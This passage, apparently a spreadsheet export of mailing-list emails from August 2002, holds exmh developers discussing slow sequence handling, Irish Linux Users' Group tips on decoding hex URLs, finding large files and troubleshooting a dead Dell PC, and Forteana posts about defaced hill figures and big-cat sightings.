    <t>--==_Exmh_927886807P Content-Type: text/plain; charset=us-ascii &gt; From:  Anders Eriksson  &gt; Date:  Mon, 26 Aug 2002 20:00:36 +0200 &gt; &gt;  &gt; lately I've got the feeling that exmh is getting slower and slower. I  &gt; just decided to check that vs. reality, and yes, speed has left the  &gt; scene somewhere between the release of 2.5 and now. &gt;  &gt; I checked on a number of small messages in a big folder (~10000  &gt; msgs). The delay of the Next button has increased considerably: &gt;  &gt; 2.5-release: 350-450 msec &gt; latest cvs: 1000-12000 msec &gt;  &gt; Frankly I think this is getting close to non-acceptable since the  &gt; user settings hasn't changed. &gt;  &gt; Anybody have any ideas where performance disappeared? Here's a fix that I think will make a real difference. Ftoc_ShowSequences needs to be able to be called with an optional list of msgids  to update and if it's called that way it only removes or adds tags for those  messages.  Then in places like MsgChange, we only update the messages which have changed. Also, a separate Ftoc_ShowSequence function which only updates the display of  one sequence should be written which also takes an optional list of msgids.   In a place like MsgChange, it would only need to update the cur sequence. If nobody else gets to it, I'll do this when I get back. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_927886807P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9bPUlK9b4h5R0IUIRAqCdAJkBYATj6wLY6RM/EPECD3yGkXMXVgCcDADM 4n+q/8HdvWmkRlGJn3lUb1M= =Rd2E -----END PGP SIGNATURE----- --==_Exmh_927886807P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: ILUG list &lt;ilug@linux.ie&gt;\nFrom: David Neary &lt;bolsh@gimp.org&gt;\nDate: Wed, 28 Aug 2002 11:04:19 +0200</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 11:04:19 +0200</t>
  </si>
  <si>
    <t>ILUG list &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] converting strings of hex to ascii</t>
  </si>
  <si>
    <t>Paul Jakma wrote:\n&gt; On Tue, 27 Aug 2002, David Neary wrote:\n&gt; \n&gt; &gt; &gt; Actually the following would be in some way sensible:\n&gt; &gt; &gt; echo -e "`echo "$enc" | sed 's/%\([0-9a-fA-F]\{2,2\}\)/\\\x\1/g'`"\n&gt; &gt; \n&gt; &gt; Why {2,2}? Why not {2}?\n&gt; \n&gt; the above was something along the lines i was attempting, once i \n&gt; realised it was a straight swap. but i couldnt get awk's gensub to \n&gt; insert the \x for %'s and ='s.\n\nPerl's pack() would do the job...\n\n&gt; &gt; PS the late reply is because the footer on the original mail (If\n&gt; &gt; you received this mail in error yadda yadda) got caught in my\n&gt; &gt; spam filter, and ended up in my junkmail directory.\n&gt; \n&gt; might not have been the footer - check my headers. :)\n\nActually, it was worse - a bodycheck showed up a "remove" URL. I\nneed a new spam filter (but I want to be able to process false\npositives, rather than dump them).\n\nCheers,\nDave.\n\n-- \n       David Neary,\n    Marseille, France\n  E-Mail: bolsh@gimp.org\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "David O'Callaghan" &lt;ocalladw@tcd.ie&gt;\nDate: Wed, 28 Aug 2002 10:48:13 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 10:48:13 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] Newbie seeks advice - Suse 7.2</t>
  </si>
  <si>
    <t>On Fri, Aug 23, 2002 at 09:26:47AM +0100, Padraig Brady wrote:\n[...]\n&gt; probably a bit old, 7.3 and 8.0 are out.\n\nAnd I've been told by a SuSE rep that 8.1 will be out in October,\nfor those who are interested.\n\nDavid	\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'zzzzteana@yahoogroups.com'" &lt;zzzzteana@yahoogroups.com&gt;\nFrom: Steve Burt &lt;Steve_Burt@cursor-system.com&gt;\nDate: Wed, 28 Aug 2002 10:42:25 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 10:42:25 +0100</t>
  </si>
  <si>
    <t>RE: [zzzzteana] Digest Number 2453</t>
  </si>
  <si>
    <t>&gt;JUST as the pyramids of Egypt were built in honour of great kings, it was\n&gt;fitting that sandy replicas were created on Weymouth beach in memory of the\n&gt;king of the castle. Fred Darrington, who became the world's most famous\nsand\n&gt;sculptor, died last week aged 91. His grandson, Mark Anderson, who has\ntaken\n&gt;over his Dorset seafront pitch, is determined that his grandfather's name\nwill\n&gt;not be forgotten, despite the impermanence of his creations.\n\nCan someone please tell me what a "pitch" constitutes? I have an idea \nit is somewhat like the spots street musicians claim, but this sounds \nmore formal.\n------------------\nJust an area of the beach by the prom where he's allowed to make his\nsculptures.\nWeymouth is where I spent my teenage years. My mum and one sister still live\nthere.\nSo I'm pretty familiar with the sculptures; pretty impressive, and very big.\n(I think he uses some sort of armature for some bits - it's not just sand)\nThey usually get vandalised, though; after a lot of drinks, it obviously is\na good idea to break into the enclosure and kick all the sculptures to bits.\nThen again, Weymouth is pretty run down, and attracts holiday makers of the\nworst sort.\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Wed, 28 Aug 2002 10:39:59 -0500</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 10:39:59 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_893671157P Content-Type: text/plain; charset=us-ascii &gt; From:  Robert Elz  &gt; Date:  Wed, 28 Aug 2002 21:44:26 +0700 &gt; &gt;     Date:        Wed, 28 Aug 2002 09:22:34 -0500 &gt;     From:        Chris Garrigues  &gt;     Message-ID:  &lt;1030544555.28815.TMDA@deepeddy.vircio.com&gt; &gt;  &gt;  &gt;   | so I'll probably poke around at the sequences performance issues, &gt;  &gt; Well, there's this wonderful piece of code in MhSeqExpand ... &gt;  &gt;     # Hack to weed out sequence numbers for messages that don't exist &gt;     foreach m $rseq { &gt;         if ![file exists $mhProfile(path)/$folder/$m] { &gt;             Exmh_Debug $mhProfile(path)/$folder/$m not found &gt;             set ix [lsearch $seq $m] &gt;             set seq [lreplace $seq $ix $ix] &gt;         } else { &gt;             # Real hack &gt;             break &gt;         } &gt;     } &gt;  &gt; which is going to run slow if a sequence happens to start with a bunch &gt; of messages that don't exist.   I'm not sure why it is important that the &gt; first message in the sequence returned exists, but not necessarily any &gt; of the others, but I'm sure glad it is, as MhSeqExpand gets called lots, &gt; and I don't know if I could cope if it were checking every file in the &gt; sequences it is looking at, all the time... Although my fingerprints are all over that, it's not actually my code and has  been in there since before 1998.  (It's code that I moved from mh.tcl to  sequences.tcl and back again).  I'm no5 sure either, but it should be a  one-time penalty because the sequence will be re-written with the bad messages  removed.  (I think.) &gt; It may help to keep a list of the valid message numbers for the current &gt; folder (though that would then need to be verified against changes to the &gt; directory).   Does tcl have a directory read function?   I assume so... &gt;  &gt; Mh_Sequence also goes and rereads the files (.mh_sequences and the &gt; context file) but I'm not sure how frequently that one is called. That *was* a problem, but if you look at Mh_Sequence (and Mh_Sequences and  Mh_SequenceUpdate), they all call MhReadSeqs to do the actual reading and it  only reads the sequences if the file has been touched.  Look for the  "Exmh_Debug Reading $filename" output in the debug log to see when sequences  are actually reread from disk. My theory is that Ftoc_ShowSequences is being called too often.  I'm about to  investigate that. &gt;   | I'll email anything I figure out since I'm leaving town in less  &gt;   | than 48 hours. &gt;  &gt; Have a good vacation. Thanks. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_893671157P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9bO7PK9b4h5R0IUIRAqBBAJ4uhmwloTb4sSG6jDwcm0ul4RvDegCfe8no +6oHNBLG/UnfWMlQoaSidZA= =44Ra -----END PGP SIGNATURE----- --==_Exmh_893671157P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: "FoRK" &lt;FoRK@xent.com&gt;\nFrom: "Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt;\nDate: Wed, 28 Aug 2002 10:34:04 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 10:34:04 -0700</t>
  </si>
  <si>
    <t>RE: Gecko adhesion finally sussed.</t>
  </si>
  <si>
    <t>Great, this is half of what I'd need to become Spider Man! Now all I need to\nfigure out is how to do that spider web shooting thing.\n\n- Jim\n\n&gt; -----Original Message-----\n&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of\n&gt; Eirikur Hallgrimsson\n&gt; Sent: Monday, August 26, 2002 10:24 PM\n&gt; To: FoRK\n&gt; Subject: Gecko adhesion finally sussed.\n&gt;\n&gt;\n&gt; (Via Robot Wisdom)   Maybe you UC folk know these people?\n&gt;\n&gt; [URL]http://www.eurekalert.org[/URL]\n&gt;\n&gt; Working at Lewis &amp; Clark College, the University of California at\n&gt; Berkeley,\n&gt; the University of California at Santa Barbara, and Stanford University,\n&gt; the interdisciplinary team:\n&gt;\n&gt;     * confirmed speculation that the gecko's amazing climbing ability\n&gt; depends on weak molecular attractive forces called van der Waals forces,\n&gt;\n&gt;     * rejected a competing model based on the adhesion chemistry of water\n&gt; molecules, and\n&gt;\n&gt; * discovered that the gecko's adhesive depends on geometry, not surface\n&gt; chemistry. In other words, the size and shape of the tips of gecko foot\n&gt; hairs--not what they are made of--determine the gecko's stickiness.\n&gt;\n&gt; To verify its experimental and theoretical results, the gecko group then\n&gt; used its new data to fabricate prototype synthetic foot-hair tips\n&gt; from two\n&gt; different materials.\n&gt;\n&gt; "Both artificial setal tips stuck as predicted," notes Autumn, assistant\n&gt; professor of biology at Lewis &amp; Clark College in Portland, Ore. "Our\n&gt; initial prototypes open the door to manufacturing the first biologically\n&gt; inspired dry, adhesive microstructures, which can have widespread\n&gt; applications."</t>
  </si>
  <si>
    <t>http://www.eurekalert.org</t>
  </si>
  <si>
    <t>To: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nFrom: Brent Welch &lt;welch@panasas.com&gt;\nDate: Wed, 28 Aug 2002 10:32:42 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 10:32:42 -0700</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;Robert Elz said:  &gt;     Date:        Wed, 28 Aug 2002 09:22:34 -0500  &gt;     From:        Chris Garrigues   &gt;     Message-ID:  &lt;1030544555.28815.TMDA@deepeddy.vircio.com&gt;  &gt;   &gt;   &gt;   | so I'll probably poke around at the sequences performance issues,  &gt;   &gt; Well, there's this wonderful piece of code in MhSeqExpand ...  &gt;   &gt;     # Hack to weed out sequence numbers for messages that don't exist  &gt;     foreach m $rseq {  &gt;         if ![file exists $mhProfile(path)/$folder/$m] {  &gt;             Exmh_Debug $mhProfile(path)/$folder/$m not found  &gt;             set ix [lsearch $seq $m]  &gt;             set seq [lreplace $seq $ix $ix]  &gt;         } else {  &gt;             # Real hack At least I'm up-front about my hacks :-)  &gt;             break  &gt;         }  &gt;     }  &gt;   &gt; which is going to run slow if a sequence happens to start with a bunch  &gt; of messages that don't exist.   I'm not sure why it is important that the  &gt; first message in the sequence returned exists, but not necessarily any  &gt; of the others, but I'm sure glad it is, as MhSeqExpand gets called lots,  &gt; and I don't know if I could cope if it were checking every file in the  &gt; sequences it is looking at, all the time... That was my thinking.  My recollection about the first message being valid is that the ftoc code wants to find that message to start its highlighting, for example, or you are selecting a message to display.  &gt; It may help to keep a list of the valid message numbers for the current  &gt; folder (though that would then need to be verified against changes to the  &gt; directory).   Does tcl have a directory read function?   I assume so... glob -nocomplain $mhProfile(path)/$folder * will return an unsorted list of the directory's contents. But the thought of keeping an in memory list of valid messages is not fun. Exmh already maintains in-core lists of messages in sequences, which is already pretty tricky  &gt; Mh_Sequence also goes and rereads the files (.mh_sequences and the  &gt; context file) but I'm not sure how frequently that one is called. In some places I maintain caches of files by checking their modify time, but the sequence files are soo small that by the time you stat them to check their date stamp, you could just read them again.  Also, now that we checkpoint message state on every message view, that file will change every time.  In the old days exmh used to cache a bunch of state about the folder. -- Brent Welch Software Architect, Panasas Inc Pioneering the World's Most Scalable and Agile Storage Network [URL]www.panasas.com[/URL] welch@panasas.com _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Vanush Paturyan &lt;mpaturya@thphys.may.ie&gt;\nDate: Wed, 28 Aug 2002 10:28:59 +0100 (IST)</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 10:28:59 +0100 (IST)</t>
  </si>
  <si>
    <t>Vanush Paturyan &lt;mpaturya@thphys.may.ie&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] [OT] Dell machine giving me hassle.</t>
  </si>
  <si>
    <t>I'm not familiar with Dell Dimension XPS, and, to be honest, not familiar with any brand-name computers. Most of my experience is China motherboards, but I've seen same behavior once. Changing the battery helps that time. It was big round battery with 'Panasonic' on it. Computer starts beeping then we removed battery from MB. It even booted up (well, loosing time and some other things). Just my 2 cents. Misha On Wed, 28 Aug 2002, Aherne Peter-pahern02 wrote: &gt; Ok, Iknow this is blatantly OT but I'm beginning to go insane. &gt; Had an old Dell Dimension XPS sitting in the corner and decided to &gt; put it to use, --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ILUG list &lt;ilug@linux.ie&gt;\nFrom: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nDate: Wed, 28 Aug 2002 10:23:20 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 10:23:20 +0100</t>
  </si>
  <si>
    <t>Padraig Brady &lt;padraig.brady@corvil.com&gt;</t>
  </si>
  <si>
    <t>David Neary wrote:\n&gt; Padraig Brady wrote:\n&gt; \n&gt;&gt;&gt;Paul Jakma wrote:\n&gt;&gt;&gt;\n&gt;&gt;&gt;&gt;chars in hex to plain ASCII?\n&gt;&gt;&gt;&gt;\n&gt;&gt;&gt;&gt;eg given\n&gt;&gt;&gt;&gt;   [URL]http://w%77%77%2Eo%70%74%6F%72%69um.n[/URL]\n&gt;&gt;&gt;&gt;\n&gt;&gt;&gt;&gt;is there an easy way to turn it into\n&gt;&gt;&gt;&gt;\n&gt;&gt;&gt;&gt;   [URL]http://www.optorium.net[/URL]\n&gt;&gt;&gt;&gt;eg, whether by piping through some already available tool, or \n&gt;&gt;&gt;&gt;programmatically (printf? - but i dont see how.).\n&gt;&gt;&gt;\n&gt;&gt;Actually the following would be in some way sensible:\n&gt;&gt;echo -e "`echo "$enc" | sed 's/%\([0-9a-fA-F]\{2,2\}\)/\\\x\1/g'`"\n&gt; \n&gt; \n&gt; Why {2,2}? Why not {2}?\n\nMe being silly, that's all.\n\nPdraig.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://w%77%77%2Eo%70%74%6F%72%69um.n http://www.optorium.net http://www.linux.ie</t>
  </si>
  <si>
    <t>To: Inn Share &lt;shareinnn@yahoo.com&gt;\nFrom: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nDate: Wed, 28 Aug 2002 10:20:35 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 10:20:35 +0100</t>
  </si>
  <si>
    <t>Inn Share &lt;shareinnn@yahoo.com&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] find the biggest file</t>
  </si>
  <si>
    <t>Inn Share wrote:\n&gt; Hi,all:\n&gt; \n&gt; Does anyone know how to list the biggest file in my\n&gt; root directory?or the second biggest ..etc...\n&gt; \n&gt; Because I want to find out what is the reason cause my\n&gt; root all most full.\n&gt; \n&gt; The system is Solaris 8 Sparc.\n&gt; \n&gt; Thanks !!!\n\nI think everybody has their own version of this,\nbut in case it's useful.. (only tested on Linux):\n\nfind $* \( -type f -o -type l \) -maxdepth 1 -mindepth 1 -print0 |\nxargs -r0 du -b --max-depth 0 |\nsort -k1n |\ngrep -v "^0"\n\nPdraig.\n\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: clare.bunkham@prudential.co.uk, zzzzteana@yahoogroups.com,\nFrom: "Scott Wood" &lt;skitster@hotmail.com&gt;\nDate: Wed, 28 Aug 2002 10:14:30 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 10:14:30 +0100</t>
  </si>
  <si>
    <t>"Scott Wood" &lt;skitster@hotmail.com&gt;</t>
  </si>
  <si>
    <t>clare.bunkham@prudential.co.uk, zzzzteana@yahoogroups.com,</t>
  </si>
  <si>
    <t>[zzzzteana] Fwd: Hill Monuments defaced to promote hunting</t>
  </si>
  <si>
    <t>The hunting community showing, yet again, how utterly out of touch they \nare....(though the anti-Esso sign on the Long Man made me smirk last week)\n\n\n&gt;From: "Carol"\n&gt;\n&gt;The white horses at Uffington and Kilburn have had hunters painted\n&gt;onto them to 'keep the pro-hunt image in the media'\n&gt;\n&gt;[URL]http://www.ananova.com[/URL]\n&gt;\n&gt;*boggle* How can the pro-hunt people think this will help their cause?\n&gt;\n&gt;Carol\n\n\nGiant horse images 'defaced by hunting activists'\n\nPro-hunt activists have defaced two of the country's national monuments - \nthe two giant white horses - to highlight their cause\n\nCampaigners for the Real Countryside Alliance say they targeted the two \nimages, on hills in Oxfordshire and North Yorkshire, "to keep the pro-hunt \nthing in the papers".\n\n\nAnanova:\n\nGiant horse images 'defaced by hunting activists'\n\nPro-hunt activists have defaced two of the country's national monuments - \nthe two giant white horses - to highlight their cause.\n\n\n\nCampaigners for the Real Countryside Alliance say they targeted the two \nimages, on hills in Oxfordshire and North Yorkshire, "to keep the pro-hunt \nthing in the papers".\n\n\n\nAerial shots show the 374ft-long Bronze Age image on the Berkshire Downs \nnear Uffington in Oxfordshire complete with three white hounds and a rider.\n\nIn North Yorkshire, a rider in full hunt regalia has been added to the 300ft \nWhite Horse cut in to the hills at Kilburn, which dates back to the 1700s.\n\nBut no-one reported anything to the police.\n\nA spokesman for North Yorkshire police said no reports had been received but \nhe had seen "a red blob" on the horse and had sent officers to investigate.\n\nIn Uffington, no-one in the village had heard anything about the reported \nincident. A spokesman for Thames Valley police said he was not aware of any \ncomplaints.\n\nActivists say the image in Oxfordshire was drawn in paint used for marking \nlines on grass tennis courts and will wash away in the first rains.\n\n\nStory filed: 21:17 Tuesday 27th August 2002\n\n\n\n\n\n\nScott\n"I cried for madder music and for stronger wine"\nErnest Dowson\n\n\n_________________________________________________________________\nMSN Photos is the easiest way to share and print your photos: \n[URL]http://photos.msn.com[/URL]\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://www.ananova.com http://photos.msn.com http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: "Martin Adamson" &lt;martin@srv0.ems.ed.ac.uk&gt;\nDate: Wed, 28 Aug 2002 10:14:08 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 10:14:08 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] It's August, and big cats are on the prowl</t>
  </si>
  <si>
    <t>The Times\n\n August 28, 2002\n \n It's August, and big cats are on the prowl\n By Alan Hamilton\n \n \n \n ROUND up the sheep. Pull on the gauntlets. Oil the shotgun. The British\n countryside is crawling with pumas, black panthers, fen tigers and other big,\n vicious cats. No corner of the nation is safe. Evidence released yesterday,\n including sightings, photographs, paw prints, livestock kills and hair\n samples, claims to prove that every county has big cats lurking in its\n undergrowth, poised to pounce on man and beast alike. \n \n Sightings have reached record levels in 2002, according to Daniel Bamping,\n founder of the British Big Cats Society, which in the past 12 months has\n received more than 800 reports of big cat sightings. \n \n During the first six months we have seen an incredible amount of big cat\n activity. We have now had reports in every single county; the response from\n the public has been fantastic, Mr Bamping said. Big cats in Britain are\n real. They are out there, they are breeding; theres more of them. \n \n Scotland and Gloucestershire are said to be hotspots of big cat activity. Mark\n Fraser, who heads the societys Scottish arm, said: Lynx are now present in\n the Scottish countryside; I believe they are established and breeding. I dont\n want to hazard a guess at the numbers; suffice it to say there are several\n hotspots, notably Fife, Aberdeenshire, Inverness and the Borders. \n \n Next month the society plans to unveil its full dossier of evidence, which\n includes two dead wild cats, pictures of paw prints and tree scratchings, as\n well as stories of a horse strangely lacerated in West Wales and a man in\n Gravesham, Kent, who had to beat a hasty retreat to his garage after his hand\n was cut by a creature the size of a labrador dog, except that it had black\n hairy tufts on the tips of its ears. \n \n The society is taking the sightings seriously. It plans to set up a network of\n trigger-cameras throughout the country to capture further evidence of the\n beasts, which it will then present to the Government. \n \n It is not, however, clear on what it wants the Government to do about it all.\n Throwing its weight behind the pro-hunting lobby might be a start. \n \n Next in August: record abductions by aliens.\n \n \n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "Carlos Luna" &lt;carlos.luna@steorn.com&gt;\nDate: Wed, 28 Aug 2002 10:00:45 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 10:00:45 +0100</t>
  </si>
  <si>
    <t>[ILUG] PPPD disconnects on me!</t>
  </si>
  <si>
    <t>Hello folks!\nI'm new to Linux, so here goes...\nI've been trying to get connected to the outside world through my modem.\nI've got Debian with kernel 2.4.18.\nI've got this Win-Modem(yes, I know) and managed to locate a proper driver\nfor it.\nMinicom is very much able to dial out.\nBut there seems to be a problem with my PPPD installation.\nWhen I type 'ppp' in the minicom terminal, all I get (after the initial info\nof my dynamic IP, etc) is a ~ and then the NO CARRIER signal.\nThen I looked into calling pppd directly using chat.\nI used this command:  pppd call Provider (where Provider is some script\nsomewhere).\nIt dials, it connects, it sends my username &amp; password, and when connection\nis established, it gives the SIGHUP signal and exits.\nThis is confirmed when me friend and I tried to connect through a serial\nport using pppd to connect ttyS0.  I ran pppd waiting for a connection, me\nfriend tried connecting and as soon as he did, pppd exited.\n\nSome expert help would be greatly appreciated as I'm sick and tired of\nhaving to reboot, get into Windoze to hook up to the net and then back to\nLinux, mounting this drive to get that file, etc.  It'd be nice never have\nto go back to Windoze(except for games, that is).\n\nThanks a million.\nCarlos\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "Brian O'Donoghue" &lt;Brian.ODonoghue@kbs.ie&gt;\nDate: Wed, 28 Aug 2002 09:59:21 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:59:21 +0100</t>
  </si>
  <si>
    <t>RE: [ILUG] [OT] Dell machine giving me hassle.</t>
  </si>
  <si>
    <t>&gt; &gt; Ok, Iknow this is blatantly OT but I'm beginning to go insane.\n&gt; &gt; Had an old Dell Dimension XPS sitting in the corner and decided to\n&gt; &gt; put it to use, I know it was working pre being stuck in the\n&gt; &gt; corner, but when I plugged it in, hit the power nothing happened.\n&gt; &gt; I opened her up and had a look and say nothing much. A little orange\n&gt; &gt; LED comes on when I plug her in but that's it, after some googling\n&gt; &gt; I found some reference to re-seating all the parts, but no change.\n&gt; &gt; The problem I'm having is that since the power supply is some Dell\n&gt; &gt; specific one, ATX block with what looks like one of the old AT\n&gt; &gt; power connectors, I cant figure out weather this is a Mobo prob\n&gt; &gt; or a PSU prob. Just to futily try and drag this back OT, I want\n&gt; &gt; to install Linux on it when I get it working. If anyone knows\n&gt; &gt; what the problem might be give me a shout.\n\nIe if you are getting a little orange LED when you plug it in then your PSU\nis probably working.\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nDate: Wed, 28 Aug 2002 09:57:04 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:57:04 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] directory merging</t>
  </si>
  <si>
    <t>John P. Looney wrote:\n&gt;  I've two directories, that once upon a time contained the same files.\n&gt; \n&gt;  Now, they don't.\n&gt; \n&gt;  Is there a tool to merge the two - create a new directory where if the\n&gt; files are the same, they aren't changed, if they are different, the one\n&gt; with the most recent datestamp is used...\n\nJust for the record mc has a nice directory\ncomparison function. This is really nice\nwhen using the ftp VFS for e.g. Of course\nif you use something like ftpfs you can use\nthe previously mentioned tools.\n\nPdraig.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "Brian O'Donoghue" &lt;Brian.ODonoghue@kbs.ie&gt;\nDate: Wed, 28 Aug 2002 09:56:41 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:56:41 +0100</t>
  </si>
  <si>
    <t>&gt; -----Original Message-----\n&gt; From: Aherne Peter-pahern02 [mailto:peter.aherne@motorola.com]\n&gt; Sent: 28 August 2002 09:29\n&gt; To: 'ilug@linux.ie'\n&gt; Subject: [ILUG] [OT] Dell machine giving me hassle.\n&gt; \n&gt; Ok, Iknow this is blatantly OT but I'm beginning to go insane.\n&gt; Had an old Dell Dimension XPS sitting in the corner and decided to\n&gt; put it to use, I know it was working pre being stuck in the\n&gt; corner, but when I plugged it in, hit the power nothing happened.\n&gt; I opened her up and had a look and say nothing much. A little orange\n&gt; LED comes on when I plug her in but that's it, after some googling\n&gt; I found some reference to re-seating all the parts, but no change.\n&gt; The problem I'm having is that since the power supply is some Dell\n&gt; specific one, ATX block with what looks like one of the old AT\n&gt; power connectors, I cant figure out weather this is a Mobo prob\n&gt; or a PSU prob. Just to futily try and drag this back OT, I want\n&gt; to install Linux on it when I get it working. If anyone knows\n&gt; what the problem might be give me a shout.\n\n\nHere is what you do.\n\nRemove all the PCI &amp; ISA/EISA cards.\nRemove the floppy disk cable from the mobo, the ide cables from the mobo...\nessentially leaving only a video card... ram and a keyboard plugged in.\n\nTurn on the system.\nIf it doesn't POST then, switch it off and remove the video card.\n\nSwitch it back on ... if your mobo doesn't emit some beeps complaining about\nlack of video card then.\n\nSwitch it off.\nRemove it's ram.\n\nSame procedure as above.\n\nIf you still don't have any kind of mobo beep codes then you can try as a\nlast ditch effort to reseat the cpu... (remembering to never ever ever power\nup your system without a heatsink &amp; fan).\n\nIf after reseating the cpu into the mobo... you still get no beep codes,\nfrom it with just the cpu inserted into the mobo ie(no pci,*isa cards or and\nno actual ide or floppy cables connected to the system)... even though you\nhave power... you either have a faulty motherboard or a faulty cpu.\n\nOnce you get beep codes various permutations of the above should eventually\ndisjunct which device it is, is causing the lack of POST.\nPower On Self Test.\n\nBod\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: spamassassin-commits@example.sourceforge.net\nFrom: Justin Mason &lt;yyyyason@users.sourceforge.net&gt;\nDate: Wed, 28 Aug 2002 09:55:18 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:55:18 -0700</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin MANIFEST,1.100.2.11,1.100.2.12</t>
  </si>
  <si>
